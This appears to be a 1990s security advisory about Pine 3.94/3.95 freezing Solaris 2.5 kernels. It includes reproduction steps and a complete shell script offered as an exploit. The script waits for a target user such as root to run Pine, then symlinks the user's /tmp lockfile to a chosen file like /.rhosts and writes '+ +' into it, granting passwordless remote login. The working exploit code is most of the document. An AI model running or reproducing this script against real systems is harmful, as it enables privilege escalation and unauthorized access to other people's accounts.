COMMAND

    kernel (pine)

SYSTEMS AFFECTED

    Solaris 2.5, Solaris 2.5.1 (on sun4u didn't work)

PROBLEM


    If configured properly,  the Pine mail  reader, versions 3.94  and
    3.95, can *freeze*  the Solaris 2.5  and 2.5.1 kernel  completely.
    No core  dump or  the like--an  outright freeze.   No TCP/IP pings
    work--network is frozen.  Even the keyboard sometimes freezes  and
    pressing the xxx-Lock keys doesn't light the respective  indicator
    light.  And if Pine can do it, that means other programs have  the
    same potential.

    You can most certainly try to reproduce this yourself!  You'll
    need the following to do the experiment:

    -   the binary of  Pine 3.95 and the respective .pinerc  file from
        my  FTP  site  at  ftp://ftp.iag.net/pub/tv/ -- files "pine.Z"
        (decompress  this)  and  "pinerc"  (name  this .pinerc in your
        home directory).   Uh, you  can trust  the binary--up  to  the
        point of system freeze, that is.  :/

    OR:

    -   GCC version 2.7.2  or 2.7.2.1, NOT  the ProCompiler (as  I  do
        not  know  if  a  ProCompiler  compiled  version will recreate
        this).

    -   Pine 3.95 sources from
        ftp://ftp.cac.washington.edu/pine/pine3.95.tar.gz.

    You'll need  to twiddle  some things  for "./build  sol" to  work:
    make  sure  that  /usr/ccs/bin/ucbcc  AND /usr/ccs/bin/cc point to
    gcc;  /usr/ccs/bin  is  in  your  path;  /usr/ucb  is  not  before
    /usr/bin or /usr/ccs/bin in your  path; and "." is the  last entry
    in your path.

    -   A .pinerc with inbox-path= set to an IMAP server.  You can  do
        this by running Pine,  going to (S)etup (C)onfig,  and setting
        the value  to a  server with  IMAP (I  use {imap.afn.org}INBOX
        where I have one of my e-mail accounts).  Or use the one  from
        my FTP site above.

    All you should  need to do  now is run  Pine.  If  you get a login
    prompt, ^C, (Q)uit, and  run it again a  few times.  Betcha  it'll
    lock the system.  It does for us, consistently.

    If you think that this is  big job, you can use followin  exploit.
    Well here is a  stupid script to exploit  the pine bug, is  better
    than to  have to  exploit it  manually. It  just sucks waiting for
    the user to quit and re-enter pine. Why is a shell script and  not
    a C program?..  simple because some root dont allow the  execution
    of  cc,  gcc  (its  a  security  problem .. duhhhhhhh.... ). So be
    happy whatever you do.

#!/bin/sh
#
# ET Lownoise 1996 Colombia
# pine bug exploit
#
# usage: pine.sh username path/file_to_create &
# ex:    pine.sh root /.rhosts &
# ex2:   pine.sh root /.rhosts > out & (and go to sleep).
#
# version 3.91, 3.92 .....
# version 3.95 fixed
#
# Note: must do some changes in the script. look 4 CHANGE THIS:
#
# Yea i know is a lame script but is better than nothing..
# try to exploit the bug without a script and you will wait
# forever.
#                     e-torres@uniandes.edu.co
#

argumentos=0
if [ $# -eq $argumentos ]
  then
    echo "Usage: $0 username path/file_to_create & "
    echo "ET Lownoise 1996 Colombia"
    exit
fi

username=$1
archivo=$2

#CHANGE THIS:

#text='text to puit in file to create'
#usr=path of the program users
#pineprog=how the pine program appears when u do a w (who) command

text='+ +'
usr=users
pineprog=pine

#
date
echo "- Looking for $1 to log in... just wait"
#
entrada=0
entro=0

until [ $entro -eq $entrada ]
do
        for nombre in `$usr`
        do
         if [ $nombre = $1 ]
            then
                entro=1

         fi
        done

done
date
echo "- Ok $username is logged now."
#
echo "- Lets wait that $1 run pine. "


noejecuto=0
ejecuto=0

until [ $ejecuto -ne $noejecuto ]
do


     for ejecutando in `w $username`
     do
       if [ $ejecutando = $pineprog ]
         then
                date
                echo '- OK ' $1 ' is running ' $pineprog '.'
                ejecuto=1

       fi
     done

done



echo "- Now lets grab the lock file of $username from /tmp"
ls -al /tmp | grep $username > temp1
cat temp1 | grep rw-rw-rw- > temporal
lockfile=`awk '{print $9}' temporal`
rm temp1
rm temporal
echo "> Username $username"
echo "> Lockfile $lockfile"
echo
echo "- OK now im going to wait that $username "
echo "  quits $pineprog "
# do it till exist lockfile, that means username havent quit pine
cd /tmp

while [ -s $lockfile ]
    do
    sleep 0
done

cd
date
echo "- OK $username quit $pineprog .. now to link $lockfile "
#$archivo is the complete path of file in username
cd /tmp
ln -s $archivo $lockfile
echo "- $lockfile is now linked "
cd
echo "- $username must now return to pine to create"
echo "  $archivo "
echo "- Waiting $username to return pine "

noejecuto=0
ejecuto=0

until [ $ejecuto -ne $noejecuto ]
do
     for ejecutando in `w $username `
     do
       if [ $ejecutando = $pineprog ]
         then
                date
                echo '- OK ' $username ' is running ' $pineprog
                ejecuto=1

       fi
     done

done
echo "- Introducing text..."
cd /tmp
echo $text > $lockfile
echo "- Erasing $lockfile "
rm $lockfile
cd
echo "THE END DUDE!"
echo "ET Lownoise 1996 "